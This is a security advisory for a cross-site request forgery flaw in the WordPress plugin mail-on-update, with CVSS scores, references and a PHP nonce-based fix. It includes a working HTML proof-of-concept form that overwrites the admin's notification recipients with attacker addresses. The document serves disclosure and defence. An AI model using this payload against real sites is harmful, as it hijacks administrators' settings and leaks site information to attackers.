WordPress plugin mail-on-update CSRF

2013-05-16 / 2013-05-18
Credit: Henri Salo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Can I get a 2013 CVE for the WordPress plugin mail-on-update CSRF vulnerability? PoC for "List of alternative recipients" below. Tested 5.1.0 version.

Homepage: http://wordpress.org/extend/plugins/mail-on-update/
Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/

    <html>
    <form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post" class="buttom-primary">
      <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" />
      <input name="submit" type="submit" value="Save"/>
    </form>
    </html>

If an attacker adds a random email to that form, the default user won't get emails, and the attacker might be interested to receive these, as the email contains information about available plugin updates.
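A server-side mitigation for the request shown above, as an added example that is not part of the original report and not the plugin's own code: a settings handler that rejects the POST unless it carries a valid WordPress nonce and comes from a user with the manage_options capability. The function names, nonce names, option name and whitespace-separated recipient format are assumptions; only the field name mailonupdate_mailto and the page slug come from the report, and the code assumes it runs inside wp-admin.

```php
<?php
// Added example: hypothetical settings handler, not the plugin's own code.
// Assumes it is loaded inside WordPress (wp-admin), where the core functions used here exist.

const MOU_NONCE_ACTION = 'mailonupdate_save_settings'; // hypothetical action name
const MOU_NONCE_FIELD  = 'mailonupdate_nonce';         // hypothetical hidden field name

// Render the recipient form with a per-user, per-action nonce in a hidden field.
function mou_render_recipient_form() {
    // Option name is assumed to match the form field name from the report.
    $current = get_option( 'mailonupdate_mailto', '' );
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=mail-on-update' ) ); ?>">
        <?php wp_nonce_field( MOU_NONCE_ACTION, MOU_NONCE_FIELD ); ?>
        <textarea name="mailonupdate_mailto"><?php echo esc_textarea( $current ); ?></textarea>
        <?php submit_button( 'Save' ); ?>
    </form>
    <?php
}

// Process the POST only when the capability check and the nonce check both pass.
function mou_save_recipients() {
    if ( ! isset( $_POST['mailonupdate_mailto'] ) ) {
        return; // not a submission of this form
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Terminates the request if the nonce is missing or invalid, which is the
    // case for a form auto-submitted from another origin as in the PoC.
    check_admin_referer( MOU_NONCE_ACTION, MOU_NONCE_FIELD );

    // Keep only syntactically valid addresses (whitespace-separated list assumed).
    $raw   = sanitize_textarea_field( wp_unslash( $_POST['mailonupdate_mailto'] ) );
    $valid = array_filter( preg_split( '/\s+/', $raw, -1, PREG_SPLIT_NO_EMPTY ), 'is_email' );
    update_option( 'mailonupdate_mailto', implode( "\n", $valid ) );
}
add_action( 'admin_init', 'mou_save_recipients' );
```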

References:

http://seclists.org/oss-sec/2013/q2/345
http://wordpress.org/extend/plugins/mail-on-update/
http://plugins.svn.wordpress.org/mail-on-update/trunk/

